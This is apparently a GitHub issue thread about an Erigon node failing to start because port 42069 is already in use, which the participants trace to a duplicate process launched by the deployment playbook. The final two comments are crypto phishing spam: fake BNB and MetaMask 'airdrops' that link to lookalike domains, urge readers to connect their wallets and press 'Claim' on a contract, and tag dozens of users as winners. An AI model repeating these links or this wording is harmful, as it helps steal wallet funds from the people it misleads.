### ISSUE TITLE
Erigon refuses to start because of multiple processes running on 42069

### ISSUE THREAD

**Issue by bmwoolf** [tzumby/erigon_terraform_ansible#1]
When deploying the Erigon playbook, then starting the Erigon node (`sudo erigon start`),  it errors out with multiple ports being used:

```
EROR[01-14|06:28:26.853] Erigon startup                           err="please open port 42069 for TCP and UDP. listen tcp 127.0.0.1:42069: bind: address already in use"
please open port 42069 for TCP and UDP. listen tcp 127.0.0.1:42069: bind: address already in use
```

Running `sudo lsof -i :42069` shows that there are two processes, but this should be normal because we are listening for both UDP and TCP.

```
COMMAND   PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
erigon  36750 erigon   16u  IPv4 188125      0t0  TCP *:42069 (LISTEN)
erigon  36750 erigon   17u  IPv4 188126      0t0  UDP *:42069 
```

Have tried running on multiple ports, listening on multiple ports, but to no avail.

**Comment by tzumby** [comment]
Hey @bmwoolf, wouldn't that mean there is an erigon process already running if you're getting that output from lsof ?

**Comment by bmwoolf** [comment]
that is correct- when i deployed this code, it was setting up 2 Erigon processes. i had to kill one of them to get it to start

**Comment by kaneson** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @erwinqxy, @KDK7monta, @zhengkai15, @kowalkarola4, @itachi2003, @snapbuy, @Grandma2639, @boytembikai7788, @ranaDherya, @labyrinth-666, @Injayzulfasril, @metalogica, @ip404, @anjelrana, @fernando801, @Blackk88, @hackingbeauty, @0x7An, @narongsaknuanthong, @alan10332000, @Chitus, @Krystof-2015, @vlc823, @holder16, @moizsajid, @salemalem, @purtyb1tch92, @Candra111, @yazoo1220, @Anthonysidess

**Comment by synchrovision** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @RyanKung, @demeoni, @amauricarrillo, @yashqwerty1, @JinruiWang, @maryokhin, @mikeumus
